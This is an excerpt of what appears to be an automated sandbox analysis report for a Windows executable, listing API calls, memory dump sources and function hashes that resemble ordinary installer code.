                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                        • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                                                                        • API String ID: 2238633743-1050967733
                                                                                                                                        • Opcode ID: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                                                                        • Instruction ID: d6497c9818d993b67a5702c7731996643d684f189bbd4b702b1f6e54e13363b7
                                                                                                                                        • Opcode Fuzzy Hash: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                                                                        • Instruction Fuzzy Hash: 50F0DA70282305CAE750BBB5FDD57263694E3A470AF18277BE841551A2C7B94844CB8C
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                        • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                                                                        • API String ID: 667068680-222143506
                                                                                                                                        • Opcode ID: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                                                                        • Instruction ID: 32a0137ea675787c0bb1f7a77b9c903aea73f6d33f3aa717a8ad139b0a70eb03
                                                                                                                                        • Opcode Fuzzy Hash: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                                                                        • Instruction Fuzzy Hash: 4DC0C9F02C1700EEAA01B7B11DCAA7A255CC500728320843F7049BA182D97C0C104F3C
                                                                                                                                        APIs
                                                                                                                                        • GetFocus.USER32 ref: 0041B57E
                                                                                                                                        • GetDC.USER32(?), ref: 0041B58A
                                                                                                                                        • GetDeviceCaps.GDI32(?,00000068), ref: 0041B5A6
                                                                                                                                        • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5C3
                                                                                                                                        • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5DA
                                                                                                                                        • ReleaseDC.USER32(?,?), ref: 0041B626
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EntriesPaletteSystem$CapsDeviceFocusRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2502006586-0
                                                                                                                                        • Opcode ID: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                                                                        • Instruction ID: 1753bd22f5710d4f749a3cf2d8329d0f84e6490acb09e3fae29671003709e3a5
                                                                                                                                        • Opcode Fuzzy Hash: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                                                                        • Instruction Fuzzy Hash: D0410631A04258AFDF10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D51CBA5
                                                                                                                                        APIs
                                                                                                                                        • SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                                                                        • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D184,?,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0F6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast
                                                                                                                                        • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                                                                        • API String ID: 1452528299-1580325520
                                                                                                                                        • Opcode ID: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                                                                        • Instruction ID: 81e1e27ad3ae8d1ea1d6b81b4c13ff0be47bc54c17845d393ef4ad8e2f10c1e8
                                                                                                                                        • Opcode Fuzzy Hash: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                                                                        • Instruction Fuzzy Hash: 2C117535A04608AFD731DA91C942B9EB6ADDF4470AF6040776D00572C3D67C5F0B992E
                                                                                                                                        APIs
                                                                                                                                        • GetSystemMetrics.USER32(0000000B), ref: 0041BDD5
                                                                                                                                        • GetSystemMetrics.USER32(0000000C), ref: 0041BDDF
                                                                                                                                        • GetDC.USER32(00000000), ref: 0041BDE9
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041BE10
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041BE1D
                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0041BE56
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CapsDeviceMetricsSystem$Release
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 447804332-0
                                                                                                                                        • Opcode ID: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                                                                        • Instruction ID: d5b995c8e3894394b735eabd433659eae54025482fea58e306a85006fdca5b97
                                                                                                                                        • Opcode Fuzzy Hash: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                                                                        • Instruction Fuzzy Hash: E5212A74E04648AFEB00EFA9C941BEEB7B4EB48714F10846AF514B7690D7785940CB69
                                                                                                                                        APIs
                                                                                                                                        • GetWindowLongA.USER32(?,000000EC), ref: 0047E766
                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CD49), ref: 0047E78C
                                                                                                                                        • GetWindowLongA.USER32(?,000000EC), ref: 0047E79C
                                                                                                                                        • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E7BD
                                                                                                                                        • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E7D1
                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E7ED
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Long$Show
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3609083571-0
                                                                                                                                        • Opcode ID: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                                                                        • Instruction ID: 463a5c2536fff799c7bf7cf61cbf8045bc8b98cac2b0bb45a0840e8ed8c25010
                                                                                                                                        • Opcode Fuzzy Hash: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                                                                        • Instruction Fuzzy Hash: 53010CB5641210ABEA00D769DE81F6637D8AB1C320F0943A6B959DF3E3C738EC408B49
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0041A6E0: CreateBrushIndirect.GDI32 ref: 0041A74B
                                                                                                                                        • UnrealizeObject.GDI32(00000000), ref: 0041B27C
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 0041B28E
                                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 0041B2B1
                                                                                                                                        • SetBkMode.GDI32(?,00000002), ref: 0041B2BC
                                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 0041B2D7
                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0041B2E2
                                                                                                                                          • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3527656728-0
                                                                                                                                        • Opcode ID: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                                                                        • Instruction ID: d03b18a2b949c207061bd18b8e5d47ed8ce294e6be165222704fda36eef26a4f
                                                                                                                                        • Opcode Fuzzy Hash: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                                                                        • Instruction Fuzzy Hash: 56F0CD756015009BDE00FFAAD9CBE4B3B989F043097048496B908DF187CA3CD8649B3A
                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateFileHandle
                                                                                                                                        • String ID: !nI$.tmp$_iu
                                                                                                                                        • API String ID: 3498533004-584216493
                                                                                                                                        • Opcode ID: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                                                                                                        • Instruction ID: 7da7e9bbb2667b7856572ae533a3071efe8e017fb0344d9459fa270775feb22d
                                                                                                                                        • Opcode Fuzzy Hash: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                                                                                                        • Instruction Fuzzy Hash: 1831C5B0A00249ABCB11EF95D842B9EBBB4AF44345F20453AF810B73C2D7785F058B69
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                                                        • ShowWindow.USER32(?,00000005,00000000,00497FC1,?,?,00000000), ref: 00497D92
                                                                                                                                          • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                                                          • Part of subcall function 004072A8: SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                                                                          • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                                                                        • String ID: .dat$.msg$IMsg$Uninstall
                                                                                                                                        • API String ID: 3312786188-1660910688
                                                                                                                                        • Opcode ID: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                                                                        • Instruction ID: abb28459e614be91aca1b68aa70fad33032f6e559e3bf784a216f74f74fa669e
                                                                                                                                        • Opcode Fuzzy Hash: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                                                                        • Instruction Fuzzy Hash: 89314F34A14114AFCB00EF65DD9296E7BB5EF89314F91857AF800AB395DB38BD01CB68
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EADA
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAE0
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB09
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                                                                                        • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                                                                        • API String ID: 828529508-2866557904
                                                                                                                                        • Opcode ID: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                                                                                                        • Instruction ID: 7e091cf0cf0c4dae12ae48626bdfb721f4796128e550bb25d34418d77cfbcdd5
                                                                                                                                        • Opcode Fuzzy Hash: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                                                                                                        • Instruction Fuzzy Hash: 70F0C8D034061136E620B57F5C82F7B598C8F94759F140436B109E62C2D96CA905426E
                                                                                                                                        APIs
                                                                                                                                        • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0223C628,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                                                        • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0223C628,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                                                        • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0223C628,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                                                        • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0223C628,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                        • String ID: uu
                                                                                                                                        • API String ID: 730355536-2249551878
                                                                                                                                        • Opcode ID: 303ccfa916ee30606edfd417ee1dfeae8d79d4aa2781d0ec5268568314661242
                                                                                                                                        • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                                                                                        • Opcode Fuzzy Hash: 303ccfa916ee30606edfd417ee1dfeae8d79d4aa2781d0ec5268568314661242
                                                                                                                                        • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                                                                                        APIs
                                                                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00458028
                                                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00458049
                                                                                                                                        • CloseHandle.KERNEL32(?,0045807C), ref: 0045806F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                                                                        • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                                                                        • API String ID: 2573145106-3235461205
                                                                                                                                        • Opcode ID: f4b7924840392a1c056809c60f673386a353f05297e24ea8de8fb179b7d06f04
                                                                                                                                        • Instruction ID: 2f0632834368beac7d1c7250186d6a5b4d0e74160b608b18ba1b2b0c741dc3d5
                                                                                                                                        • Opcode Fuzzy Hash: f4b7924840392a1c056809c60f673386a353f05297e24ea8de8fb179b7d06f04
                                                                                                                                        • Instruction Fuzzy Hash: 8101A231600204AFD710EBA98C02A5A73A8EB49B25F51407BFC10E73D3DE399E08965D
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                                                                        • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                                                                        • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                                                                        • API String ID: 3478007392-2498399450
                                                                                                                                        • Opcode ID: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                                                                        • Instruction ID: c922fa4e85abb1c6873f36dcd01b6443d81c66d6c3501223796626af46e79b09
                                                                                                                                        • Opcode Fuzzy Hash: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                                                                        • Instruction Fuzzy Hash: 5CE0ECB2740324EADA103B627E8AF663558E724B19F50043BF001751F1C7FD1C80CA9E
                                                                                                                                        APIs
                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                                                                        • String ID: AllowSetForegroundWindow$user32.dll
                                                                                                                                        • API String ID: 1782028327-3855017861
                                                                                                                                        • Opcode ID: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                                                                        • Instruction ID: d51ed2a8d8be4cb67b0f2e6afaff03014389f5b4c9f6752a27b175deb1fe6994
                                                                                                                                        • Opcode Fuzzy Hash: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                                                                        • Instruction Fuzzy Hash: D7D0C790248701B9D910B3F64D46E9F3A5D894471CB50C47BB418E61C5DA7CFD04893D
                                                                                                                                        APIs
                                                                                                                                        • BeginPaint.USER32(00000000,?), ref: 00416C52
                                                                                                                                        • SaveDC.GDI32(?), ref: 00416C83
                                                                                                                                        • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D45), ref: 00416CE4
                                                                                                                                        • RestoreDC.GDI32(?,?), ref: 00416D0B
                                                                                                                                        • EndPaint.USER32(00000000,?,00416D4C,00000000,00416D45), ref: 00416D3F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
